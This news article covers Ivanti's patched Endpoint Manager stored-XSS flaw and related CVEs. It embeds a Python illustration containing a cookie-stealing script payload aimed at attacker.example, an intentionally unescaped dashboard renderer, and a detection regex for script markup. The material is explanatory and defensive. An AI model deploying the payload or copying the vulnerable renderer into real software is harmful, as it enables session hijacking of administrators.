
Ivanti warns of critical code execution flaw in Endpoint Manager

Summary

– Ivanti has disclosed a critical vulnerability (CVE-2025-10573) in its Endpoint Manager software: a cross-site scripting flaw that, per Ivanti, lets a remote unauthenticated attacker achieve code execution, with user interaction required.
– The attacker plants malicious JavaScript in data the administrator dashboard displays; the script runs in the administrator's browser when the dashboard is viewed, and can hijack the administrator's session.
– Ivanti has released a patch (EPM 2024 SU4 SR1) and notes the risk is lower because the software is not designed for internet exposure, yet hundreds of instances are currently online.
– The company also patched three high-severity vulnerabilities, with two allowing arbitrary code execution, though exploitation requires specific user interaction.
– While no current exploitation is known, Ivanti EPM flaws have a history of being targeted, as evidenced by past CISA warnings and mandates to patch similar actively exploited vulnerabilities.

A critical vulnerability in Ivanti’s Endpoint Manager (EPM) software demands immediate attention from system administrators. The flaw, identified as CVE-2025-10573, enables remote attackers to execute arbitrary code on affected systems. It is a cross-site scripting issue that an unauthenticated attacker can use to plant malicious JavaScript, though it requires interaction from a user (an administrator viewing the poisoned content) to succeed.

The problem arises when an attacker can reach the main EPM web service. They can then register fake managed devices with the server, and the attacker-supplied device data carrying the malicious script is stored and later rendered into the administrator’s web dashboard. When an administrator simply views the dashboard during routine work, the script runs in their browser and hands control of the administrator’s session to the attacker. Because that session administers the endpoint fleet, this kind of takeover can lead to severe network compromise.
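The stored cross-site scripting pattern described above, reduced to its essentials as an added illustration (this is not Ivanti's code, and nothing here is an EPM exploit): an inventory record whose hostname field carries script markup, a dashboard renderer that concatenates that field straight into HTML beside one that escapes it, and a hunt function an administrator could run over an exported inventory to spot records that look like markup rather than hostnames. The `Device` fields, the sample records and the attacker.example domain are all assumptions constructed for the example; EPM's real inventory schema is not described on the page.

```python
import html
import re
from dataclasses import dataclass


@dataclass
class Device:
    # Assumed fields; the page does not describe EPM's real inventory schema.
    hostname: str
    ip: str


# Constructed sample inventory: one ordinary device and one "registered" by an
# attacker whose hostname is a script payload. Generic stored-XSS illustration only.
SAMPLE_INVENTORY = [
    Device("ws-finance-01", "10.0.4.17"),
    Device('<script>location="https://attacker.example/?c="+document.cookie</script>',
           "10.0.9.250"),
]


def render_row_vulnerable(d: Device) -> str:
    """Vulnerable: attacker-controlled fields go straight into the HTML."""
    return f"<tr><td>{d.hostname}</td><td>{d.ip}</td></tr>"


def render_row_hardened(d: Device) -> str:
    """Hardened: every untrusted field is HTML-escaped for the element context."""
    return (f"<tr><td>{html.escape(d.hostname, quote=True)}</td>"
            f"<td>{html.escape(d.ip, quote=True)}</td></tr>")


def render_dashboard(devices, row_fn) -> str:
    """Builds the device table the administrator would view."""
    rows = "\n".join(row_fn(d) for d in devices)
    return f"<table>\n{rows}\n</table>"


def contains_live_script(page: str) -> bool:
    """True if the rendered page carries an unescaped <script> tag."""
    return "<script" in page.lower()


# Markup that has no business in a hostname or address field.
SUSPICIOUS = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|object|embed)\b|javascript:|\bon[a-z]+\s*=",
    re.IGNORECASE,
)


def find_poisoned_records(devices) -> list:
    """Hunt step: flag inventory records whose text fields look like HTML or JavaScript."""
    return [d for d in devices
            if SUSPICIOUS.search(d.hostname) or SUSPICIOUS.search(d.ip)]


if __name__ == "__main__":
    vulnerable_page = render_dashboard(SAMPLE_INVENTORY, render_row_vulnerable)
    hardened_page = render_dashboard(SAMPLE_INVENTORY, render_row_hardened)
    print("vulnerable page executes script:", contains_live_script(vulnerable_page))
    print("hardened page executes script:", contains_live_script(hardened_page))
    for d in find_poisoned_records(SAMPLE_INVENTORY):
        print("suspicious inventory record from", d.ip, ":", d.hostname)
```

The hardened renderer is the fix for the rendering side; the hunt function is what a defender wants after patching, since a device record planted before the update is still sitting in the inventory and the patched dashboard merely stops it from executing.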

Ivanti, a major provider of IT management solutions to tens of thousands of organizations globally, has issued a patch in its EPM 2024 SU4 SR1 update. The company emphasizes that the risk should be lower because EPM systems are not designed for direct internet exposure. Real-world data complicates that assessment: scanning by the Shadowserver platform shows hundreds of Ivanti EPM instances currently reachable from the internet, with the highest concentrations in the United States, Germany, and Japan. Every one of those instances is reachable by an unauthenticated attacker, which significantly increases the potential for exploitation.

In the same security update, Ivanti addressed three additional high-severity vulnerabilities. Two of these, tracked as CVE-2025-13659 and CVE-2025-13662, could also permit unauthenticated remote code execution, but only if the target connects to a malicious server or imports a crafted configuration file. Ivanti states there is no evidence of these vulnerabilities being used in active attacks, and that they were reported through the company’s responsible disclosure program.

Despite the lack of observed exploitation for these specific issues, Ivanti EPM has been a repeated target for attackers. Earlier this year, the Cybersecurity and Infrastructure Security Agency (CISA) flagged multiple critical EPM vulnerabilities that were being actively exploited and mandated that federal agencies patch them within strict deadlines, underscoring the product’s attractiveness to threat actors. That history is the practical reason to apply the latest update promptly rather than rely on the assumption that EPM is never exposed.

(Source: Bleeping Computer)
